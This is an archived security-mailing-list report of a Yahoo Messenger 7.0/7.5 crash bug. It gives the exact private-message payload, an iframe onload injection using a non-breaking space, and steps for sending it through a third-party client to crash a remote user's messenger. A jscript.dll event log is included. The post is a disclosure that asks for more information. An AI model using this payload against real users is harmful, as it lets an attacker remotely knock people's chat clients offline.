SecurityvulnsSECURITYVULNS:DOC:13274Yahoo messenger bug
Hi,
I found a vulnerability in yahoo messenger that if you receive a Private message with
this string "msg:---------------------------------------------iframe
onload=$InlineAction()>:)"(without quotes)Yahoo messenger will Crash with a runtime error.
Remote crash proof of concept:
- Open messenger and log it.
- Open a yahoo chat third party like yahelite version 269 through Ymsgr protocol and
log it with another account. - Send a Pm to the messenger account with this string: "s: msg
:---------------------------------------------iframe onload=$InlineAction()>:)" (without
quotes) - The remote user will crash closing down her messenger.
Note: "msg :" this space must be created with alt+0160.
s:(space)msg(alt+0160):---------------------------------------------iframe
onload=$InlineAction()>:)
Tested in yahoo messenger 7.0/7.5
I didn't tried it in Yahoo messenger 8.0 Beta yet
This is the event log
0000: 41 70 70 6c 69 63 61 74 Applicat
0008: 69 6f 6e 20 46 61 69 6c ion Fail
0010: 75 72 65 20 20 79 70 61 ure ypa
0018: 67 65 72 2e 65 78 65 20 ger.exe
0020: 37 2e 30 2e 30 2e 34 33 7.0.0.43
0028: 38 20 69 6e 20 6a 73 63 8 in jsc
0030: 72 69 70 74 2e 64 6c 6c ript.dll
0038: 20 35 2e 36 2e 30 2e 38 5.6.0.8
0040: 38 33 31 20 61 74 20 6f 831 at o
0048: 66 66 73 65 74 20 30 30 ffset 00
0050: 30 31 36 38 39 31 0d 0a 016891…
I have installed the latest version of jscript.dll but the problem continues.
So do you have any information about this issue?
I discover that it's a vulnerability exploited in the wild since february but i don't
have enough information.
Regards
1GB gratis, Antivirus y Antispam
Correo Yahoo!, el mejor correo web del mundo
Abrí tu cuenta aquí